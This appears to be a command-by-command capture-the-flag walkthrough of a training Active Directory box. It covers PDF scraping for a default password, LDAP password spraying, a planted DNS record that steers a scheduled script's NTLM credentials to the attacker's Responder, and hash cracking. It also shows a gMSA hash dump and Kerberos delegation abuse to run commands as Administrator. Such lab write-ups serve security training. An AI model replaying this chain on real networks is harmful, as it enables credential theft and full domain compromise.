$ rustscan -a 10.129.137.82
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
49667/tcp open unknown syn-ack
49677/tcp open unknown syn-ack
49678/tcp open unknown syn-ack
49698/tcp open unknown syn-ack
49704/tcp open unknown syn-ack
52979/tcp open unknown syn-ack
$ sudo nmap -p- -T4 -A 10.129.137.82
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-06 23:30:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m53s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m54s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m53s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m54s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
52979/tcp open msrpc Microsoft Windows RPC
$ echo 10.129.137.82 intelligence.htb dc.intelligence.htb | sudo tee -a /etc/hosts
$ nikto -h http://intelligence.htb
$ dirb http://intelligence.htb
http://intelligence.htb/documents/2020-01-01-upload.pdf
http://intelligence.htb/documents/2020-12-15-upload.pdf
contact@intelligence.htb
Script to download all PDF files:
import requests
from datetime import date, timedelta

BASE_URL = "http://intelligence.htb/documents/"
session = requests.Session()

def url_ok(url):
    """HEAD the URL and report whether the server answers 200."""
    return session.head(url).status_code == 200

# Document names follow YYYY-MM-DD-upload.pdf; walk every day of 2019-2021
# (iterating a date object handles month lengths, so the 31st is not skipped).
day = date(2019, 1, 1)
while day < date(2022, 1, 1):
    pdf = day.isoformat() + "-upload.pdf"
    url = BASE_URL + pdf
    if url_ok(url):
        print(url + "\tDocument Exists")
        with open(pdf, "wb") as fh:
            fh.write(session.get(url).content)
    day += timedelta(days=1)
kali@kali:~/0.htb/release_arena/Intelligence/doc$ pdfgrep password *.pdf
2020-06-04-upload.pdf:Please login using your username and the default password of:
2020-06-04-upload.pdf:After logging in please change your password as soon as possible.
http://intelligence.htb/documents/2020-06-04-upload.pdf
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible
kali@kali:~/0.htb/release_arena/Intelligence/pdf$ exiftool *.pdf | grep Creator | awk '{print $3}' | sort -u > users.txt
kali@kali:~/0.htb/release_arena/Intelligence/pdf$ cat users.txt
Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
David.Reed
David.Wilson
Ian.Duncan
Jason.Patterson
Jason.Wright
Jennifer.Thomas
Jessica.Moody
John.Coleman
Jose.Williams
Kaitlyn.Zimmerman
Kelly.Long
Nicole.Brock
Richard.Williams
Samuel.Richardson
Scott.Scott
Stephanie.Young
Teresa.Williamson
Thomas.Hall
Thomas.Valenzuela
Tiffany.Molina
Travis.Evans
Veronica.Patel
William.Lee
$ crackmapexec ldap intelligence.htb -u ./users.txt -p 'NewIntelligenceCorpUser9876'
LDAP 10.129.137.82 389 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Thomas.Hall:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
kali@kali:~/0.htb/release_arena/Intelligence$ smbclient -L \\\\intelligence.htb\\ -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
IT Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
kali@kali:~/0.htb/release_arena/Intelligence$ smbclient \\\\intelligence.htb\\IT -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Apr 18 20:50:55 2021
.. D 0 Sun Apr 18 20:50:55 2021
downdetector.ps1 A 1046 Sun Apr 18 20:50:55 2021
3770367 blocks of size 4096. 1437988 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (9.7 KiloBytes/sec) (average 9.7 KiloBytes/sec)
kali@kali:~/0.htb/release_arena/Intelligence$ smbclient \\\\intelligence.htb\\Users -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Apr 18 21:20:26 2021
.. DR 0 Sun Apr 18 21:20:26 2021
Administrator D 0 Sun Apr 18 20:18:39 2021
All Users DHSrn 0 Sat Sep 15 03:21:46 2018
Default DHR 0 Sun Apr 18 22:17:40 2021
Default User DHSrn 0 Sat Sep 15 03:21:46 2018
desktop.ini AHS 174 Sat Sep 15 03:11:27 2018
Public DR 0 Sun Apr 18 20:18:39 2021
Ted.Graves D 0 Sun Apr 18 21:20:26 2021
Tiffany.Molina D 0 Sun Apr 18 20:51:46 2021
3770367 blocks of size 4096. 1438244 blocks available
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
$ cat downdetector.ps1
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
# Every DNS node in the domain zone whose name starts with "web" is contacted,
# and -UseDefaultCredentials sends the running account's credentials to it.
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
$ python3 krbrelayx-master/dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 --action add -r web.intelligence.htb -d 10.10.14.34 10.129.137.82
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
$ sudo responder -I tun0 -A
[sudo] password for kali:
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [ON]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.34]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-S68NRQA808Z]
Responder Domain Name [36ZS.LOCAL]
Responder DCE-RPC Port [48746]
[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.14.34) is not on the same subnet than the DNS server (192.168.8.2).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.129.137.82
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:a8c6796a545b97ca...
[*] Skipping previously captured hash for intelligence\Ted.Graves
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --show
TED.GRAVES::intelligence:a8c6796a545b97ca:508a3579a7b1715b69176066e5c68141:...:Mr.Teddy
http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html
kali@kali:~/0.htb/release_arena/Intelligence$ git clone https://github.com/micahvandeusen/gMSADumper.git
Cloning into 'gMSADumper'...
remote: Enumerating objects: 8, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 8 (delta 0), reused 8 (delta 0), pack-reused 0
Receiving objects: 100% (8/8), 14.02 KiB | 341.00 KiB/s, done.
kali@kali:~/0.htb/release_arena/Intelligence$ cd gMSADumper/
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ ll
total 36
-rw-r--r-- 1 kali kali 3312 Jul 6 13:50 gMSADumper.py
-rw-r--r-- 1 kali kali 0 Jul 6 13:50 __init__.py
drwxr-xr-x 2 kali kali 4096 Jul 6 13:50 __pycache__
-rw-r--r-- 1 kali kali 491 Jul 6 13:50 README.md
-rw-r--r-- 1 kali kali 22862 Jul 6 13:50 structure.py
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
svc_int$:::d64b83fe606e6d3005e20ce0ee932fe2
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ sudo net time set -S intelligence.htb
[sudo] password for kali:
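The KRB_AP_ERR_SKEW above is the KDC rejecting a request whose timestamp falls outside the realm's allowed clock skew; the nmap ssl-date output earlier in this writeup had already reported "+6h59m53s from scanner time". As an added example (not part of the original writeup), this Python snippet parses that nmap skew token and checks it against the 5-minute tolerance, which is the documented Kerberos default and an assumption here rather than a value read from this box, so the failure can be predicted before any ticket request is made.

```python
import re
from datetime import timedelta

# Kerberos rejects a request whose timestamp differs from the KDC clock by
# more than the realm's allowed skew; 5 minutes is the documented default
# (assumed here, not read from this box).
MAX_SKEW = timedelta(minutes=5)

# nmap's ssl-date/clock-skew output prints offsets such as "+6h59m53s",
# "-4m59s" or "0s"; every unit is optional.
_SKEW_RE = re.compile(r"([+-]?)(?:(\d+)d)?(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?")


def parse_nmap_skew(text: str) -> timedelta:
    """Turn an nmap skew token into a signed timedelta (server clock minus scanner clock)."""
    m = _SKEW_RE.fullmatch(text.strip())
    if not m or not any(m.groups()[1:]):
        raise ValueError(f"unrecognised skew string: {text!r}")
    sign, days, hours, mins, secs = m.groups()
    delta = timedelta(days=int(days or 0), hours=int(hours or 0),
                      minutes=int(mins or 0), seconds=int(secs or 0))
    return -delta if sign == "-" else delta


def skew_from_nmap_line(line: str) -> timedelta:
    """Extract the skew from a full '|_ssl-date: ...; +6h59m53s from scanner time.' line."""
    m = re.search(r";\s*([+-]?[0-9dhms]+)\s+from scanner time", line)
    if not m:
        raise ValueError("no skew found in nmap output line")
    return parse_nmap_skew(m.group(1))


def kerberos_will_accept(skew: timedelta) -> bool:
    """True when the offset is within the KDC's tolerance, so AS/TGS requests can succeed."""
    return abs(skew) <= MAX_SKEW


if __name__ == "__main__":
    # Constructed input, copied from the scan output format seen on this box.
    line = "|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m53s from scanner time."
    skew = skew_from_nmap_line(line)
    verdict = "OK" if kerberos_will_accept(skew) else "expect KRB_AP_ERR_SKEW"
    print(f"skew {skew}: {verdict}")
```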
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
# Export the KRB ticket so the impacket tools pick it up
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ export KRB5CCNAME=Administrator.ccache
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ atexec.py -k -no-pass dc.intelligence.htb 'type C:\Users\Tiffany.Molina\Desktop\user.txt'
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation
[!] This will work ONLY on Windows >= Vista
[*] Creating task \tgNjYZHc
[*] Running task \tgNjYZHc
[*] Deleting task \tgNjYZHc
[*] Attempting to read ADMIN$\Temp\tgNjYZHc.tmp
2cca7a12ad640c699d8069c7a2eab160
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ atexec.py -k -no-pass dc.intelligence.htb 'type C:\Users\Administrator\Desktop\root.txt'
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation
[!] This will work ONLY on Windows >= Vista
[*] Creating task \MEbHJZiS
[*] Running task \MEbHJZiS
[*] Deleting task \MEbHJZiS
[*] Attempting to read ADMIN$\Temp\MEbHJZiS.tmp
dd95742569cd89e4eecb082d39c44891